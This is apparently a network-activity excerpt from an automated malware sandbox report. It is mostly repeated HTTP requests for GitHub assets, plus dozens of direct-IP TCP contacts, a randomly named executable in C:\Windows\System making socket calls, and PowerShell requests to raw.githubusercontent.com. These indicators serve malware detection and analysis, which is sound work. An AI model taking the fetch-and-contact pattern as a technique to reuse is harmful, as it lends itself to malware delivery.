Source: global traffic	HTTP traffic detected: GET /assets/sap-96248a56d312.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/mercedes-fcf97d2d6ec4.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/pg-f1f19955c4e4.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/telus-df0c2109df99.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-0-df97fa6b0c27.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-copilot-editor-6474457a5b19.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-1-c219318e479a.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-productivity-c304b83d09c7.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-copilot-sidebar-3d2efb504577.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/bg-glow-purple-6e9a6a96cb04.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-actions-2-c5178134f381.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-codespaces-1d2d17e8b2b7.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-mobile-chat-9e7549906574.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-2-f30dcc9bd35c.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-security-2-f6a799957581.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-ghas-list-84af1f1ce2b8.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/bg-glow-blue-036b8dc2d1ce.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-dependabot-d98c73cc6724.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-code-scanning-fc9dfb212aa3.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-3-9e542b5c31b8.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-secret-scanning-2-88fb429376d6.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-collaboration-2-e46b1fb1d363.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/issues-plan-2-46d1ce1d4519.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-projects-2-26077f1dd188.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-discussions-2-b915a6dd867e.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-pull-requests-2-280cc958fc05.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/directus-4da9e46da0ac.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/commandpost-18d45fffda67.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/chaynhq-4c5953025dca.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/imolorhe-9d771b1d4332.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dayhaysoos-c50659cac73b.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/yyx990803-e11c7b140b17.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/eslint-33bd6140c37f.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sindresorhus-d3224f241a4d.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/homebrew-c7e38eeacb52.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/globe-d6f3f4ee645a.jpg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-copilot-54114bfd1d20.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-mona-d1c861cd8018.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-star-36e5b5724973.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-diamond-ed642fc95144.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-orb-a0438104a7a2.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-blur-8bc8e1f23df6.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217
Source: unknown	TCP traffic detected without corresponding DNS query: 3.120.98.217

Source: C:\Windows\System\ERbKWDm.exe

Code function: 5_2_00007FF67DCD4648 WSAStartup,WSARecvFrom,

5_2_00007FF67DCD4648

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: github.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dark-9c5b7a476542.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/light-3e154969b9f9.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-primitives-4cf0d59ab51a.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-fefb1a332c28.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/global-103ebe55f9d9.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/github-6da540aa3f84.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dashboard-a70f6c490d6e.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/experiments-d77f07364a5f.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/site-fbd7cf8f6ba2.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/discussions-adf1d1b8b95c.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/home-339181319b7e.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/primer-react-css.8879c83c1311e6328466.module.css HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/wp-runtime-f35b332dbe90.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/vendors-node_modules_dompurify_dist_purify_js-b73fdff77a4e.js HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
